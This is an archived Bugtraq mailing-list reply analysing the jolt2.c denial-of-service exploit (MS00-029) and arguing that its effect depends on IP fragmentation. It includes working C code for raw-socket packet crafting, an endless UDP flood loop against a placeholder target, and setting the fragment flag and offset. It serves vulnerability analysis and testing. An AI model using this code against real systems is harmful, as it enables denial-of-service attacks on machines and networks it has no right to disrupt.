Bugtraq mailing list archives

Re: Revision 2: Analysis of jolt2.c (MS00-029)


From: dleblanc () MINDSPRING COM (David LeBlanc)
Date: Mon, 29 May 2000 20:39:57 -0700


At 05:38 PM 5/27/00 +0200, you wrote:

> Phonix <phonix () moocow org> wrote:
> > By the way, setting the checksum to 0 is perfectly valid
> > if you are offloading the checksumming to the NIC.
>
> The code never mentioned this, and I failed to think of it.
> However:

This is also the way that many stacks work, even with IP_HDRINCL set - in
order to get the IP stack (or NIC) to calculate it for you, leave it set to
zero. Again, this is why it is usually best to look and see what something
is doing on the wire before going off and assuming mistakes.
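For the curious, a quick sketch of what that looks like on a Linux raw socket
(this is illustrative code, not anything taken from jolt2.c, and the addresses
and ports are placeholders).  The IP checksum is left at zero and the stack
fills it in on the way out, per raw(7):

/*
 * Illustrative only: send one UDP-in-IP packet through a raw socket,
 * leaving the IP checksum at 0 so the stack (or NIC) computes it.
 * Needs root; addresses and ports are placeholders.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <sys/socket.h>

int main(void)
{
    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);  /* IP_HDRINCL implied */
    if (s < 0) { perror("socket"); return 1; }

    char pkt[sizeof(struct iphdr) + sizeof(struct udphdr)];
    memset(pkt, 0, sizeof(pkt));
    struct iphdr  *ip  = (struct iphdr *)pkt;
    struct udphdr *udp = (struct udphdr *)(pkt + sizeof(struct iphdr));

    ip->version  = 4;
    ip->ihl      = 5;
    ip->ttl      = 255;
    ip->protocol = IPPROTO_UDP;
    ip->tot_len  = htons(sizeof(pkt));
    ip->saddr    = inet_addr("10.0.0.1");   /* placeholder source */
    ip->daddr    = inet_addr("10.0.0.2");   /* placeholder target */
    ip->check    = 0;                       /* left at 0 on purpose */

    udp->source = htons(1024);
    udp->dest   = htons(1025);
    udp->len    = htons(sizeof(struct udphdr));
    udp->check  = 0;                        /* 0 = "no UDP checksum" */

    struct sockaddr_in dst;
    memset(&dst, 0, sizeof(dst));
    dst.sin_family      = AF_INET;
    dst.sin_addr.s_addr = ip->daddr;

    if (sendto(s, pkt, sizeof(pkt), 0,
               (struct sockaddr *)&dst, sizeof(dst)) < 0)
        perror("sendto");
    close(s);
    return 0;
}

Watch it with a sniffer and the checksum field shows up filled in on the wire,
even though the code never computed it.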

> I originally thought that this _may_ be proof of another
> problem - What if _this_ code isn't exploiting a fragmentation
> vulnerability, but rather a network layer resource exhaustion
> vulnerability? The net results could be the same (CPU and RAM
> crunching), but be caused by entirely different reasons.

It is really pretty trivial to check for this.  Just make a regular UDP or
ICMP socket, bind it, build some data segment, and blast away.  See what
the results are on the other end.  I did this years ago, and NT shrugs
it off.  You see a little CPU rise, but even getting hit with that locally
on a 100Mb segment, you don't get the machine to freeze.  I like to test
things before I speculate in public.  YMMV.
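If it helps, a throwaway version of that test could look like the following
(ordinary UDP socket, no raw-socket games; the target address, port and
payload size are placeholders I made up):

/*
 * Illustrative resource-exhaustion test: blast small UDP datagrams at a
 * target as fast as an ordinary socket will go, then watch CPU and memory
 * on the other end.  Address, port and payload size are placeholders.
 */
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(void)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) { perror("socket"); return 1; }

    struct sockaddr_in dst;
    memset(&dst, 0, sizeof(dst));
    dst.sin_family      = AF_INET;
    dst.sin_port        = htons(1025);            /* arbitrary port */
    dst.sin_addr.s_addr = inet_addr("10.0.0.2");  /* placeholder target */

    char data[29];                                /* small data segment */
    memset(data, 'A', sizeof(data));

    for (;;)                                      /* blast away */
        sendto(s, data, sizeof(data), 0,
               (struct sockaddr *)&dst, sizeof(dst));
}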

> Several people have told (flamed?) me that I am completely wrong,
> simply because the Microsoft and Bindview advisories state
> that it is a fragmentation problem.

Well - pretty easy to test with the code that is out there.  Just modify
the packet to make it a normal, non-fragmented packet, and note that the
machine doesn't freeze.  Put the frag bit back, set the offset, and the
problem comes back.  Seems obvious to me.
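In case it isn't obvious how small that change is, something along these
lines does it (illustrative C, not the actual jolt2.c source; the offset
value below is just an example, not necessarily the one the exploit uses):

/*
 * Illustrative: flip an IP header between "plain packet" and "fragment"
 * by rewriting the fragment field.  IP_MF / IP_OFFMASK come from
 * <netinet/ip.h>; the offset value in main() is just an example.
 */
#include <stdio.h>
#include <arpa/inet.h>
#include <netinet/ip.h>

static void make_unfragmented(struct iphdr *ip)
{
    ip->frag_off = 0;                  /* no flags, offset 0 */
}

static void make_fragment(struct iphdr *ip, int more_frags, unsigned off_units)
{
    /* low 13 bits = offset in 8-byte units, IP_MF = "more fragments" */
    ip->frag_off = htons((more_frags ? IP_MF : 0) | (off_units & IP_OFFMASK));
}

int main(void)
{
    struct iphdr ip = { 0 };

    make_fragment(&ip, 1, 8190);       /* example: large offset, MF set */
    printf("fragment: frag_off = 0x%04x\n", ntohs(ip.frag_off));

    make_unfragmented(&ip);            /* the "does it still freeze?" case */
    printf("plain:    frag_off = 0x%04x\n", ntohs(ip.frag_off));
    return 0;
}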

> This does not change the facts however.

The facts are that the frag bit has to be set, or you can't cause a problem.

> I would _really_
> like to see this code (jolt2.c) have the same results
> _WITH_ rate limiting implemented before I blindly accept
> the results.

OK, this is also trivial to do - instead of:

while(1)
{
  sendto(...);
}

inject a sleep(), or, for a finer-grained timeout, use a select().  Or stick
a counter in there, send some number of packets and stop.  Now see what the
behavior of the target is.
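To make that concrete, an illustrative drop-in for the loop (not code from
jolt2.c itself; the socket, packet and destination are assumed to be built
elsewhere in the surrounding program) could look like:

/*
 * Illustrative rate-limited replacement for the while(1) loop above:
 * send a fixed number of packets, pausing between sends with select()
 * as a fine-grained timer.
 */
#include <stddef.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>

static void paced_send(int sock, const void *pkt, size_t len,
                       const struct sockaddr *dst, socklen_t dlen,
                       long count, long usec_between)
{
    for (long i = 0; i < count; i++) {    /* counter: stop after 'count' packets */
        sendto(sock, pkt, len, 0, dst, dlen);

        struct timeval tv;
        tv.tv_sec  = usec_between / 1000000;
        tv.tv_usec = usec_between % 1000000;
        select(0, NULL, NULL, NULL, &tv); /* finer-grained pause than sleep() */
    }
}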

> (I'm not saying anyone is lying here, I just
> like seeing proof before accepting something as facts.)

Well, so go try it and see.  The code is really fairly nicely written
(despite disclaimers about being hacked together), and all of these variants
that would let you actually test these things are easy modifications to make.
To me, that's what you do when you analyze a problem, but again, YMMV.

> 1. Microsoft doesn't verify the structural integrity (the
>    packet is truncated!)

Or it triggers a problem before any further verification can be performed.
There are a lot of validation steps in determining whether a packet is
good, and the ordering of these steps is a very non-trivial optimization
problem. If something goes fubar at step n, then step n+1 isn't going to be
reached, and we cannot come to conclusions about the efficiency or even the
presence of step n+1.
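A toy example of that point (just an illustration of early-exit validation
ordering, not anything from Microsoft's stack):

/*
 * Toy illustration of ordered validation with early exit: if a check
 * (or a crash) happens at step n, nothing after it ever runs, so a
 * failure tells you nothing about the later steps.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <netinet/ip.h>

static bool header_looks_ok(const struct iphdr *ip, size_t captured_len)
{
    if (captured_len < sizeof(struct iphdr))         /* step 1: enough bytes?  */
        return false;
    if (ip->version != 4)                            /* step 2: version        */
        return false;
    if (ip->ihl < 5 || ip->ihl * 4u > captured_len)  /* step 3: header length  */
        return false;
    /* steps 4, 5, ... (checksum, total length vs. what actually arrived, etc.)
       are never reached if an earlier step fails or blows up. */
    return true;
}

int main(void)
{
    struct iphdr ip = { 0 };
    ip.version = 4;
    ip.ihl = 5;
    printf("truncated capture ok? %d\n", header_looks_ok(&ip, 8));
    printf("full header ok?       %d\n", header_looks_ok(&ip, sizeof ip));
    return 0;
}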

> 2. It is really a network layer resource exhaustion attack
>    rather than a fragmentation attack. (NOTE! THIS IS JUST
>    A THEORY! I WOULD HAPPILY BE PROVEN WRONG HERE, BUT PLEASE
>    PROVIDE PROOF RATHER THAN JUST FLAME ME!)

So test your theories, especially when the code you have makes it easy.  If
you could say "I modified jolt2.c to change such and such, and NT [still
blows up | does not blow up | my router dies instead | the wires all melt |
... ]", then that would be really useful to know.  Without testing, you've
just annotated the code (which is nice), and the speculation by itself isn't
all that helpful (to me).

David LeBlanc
dleblanc () mindspring com

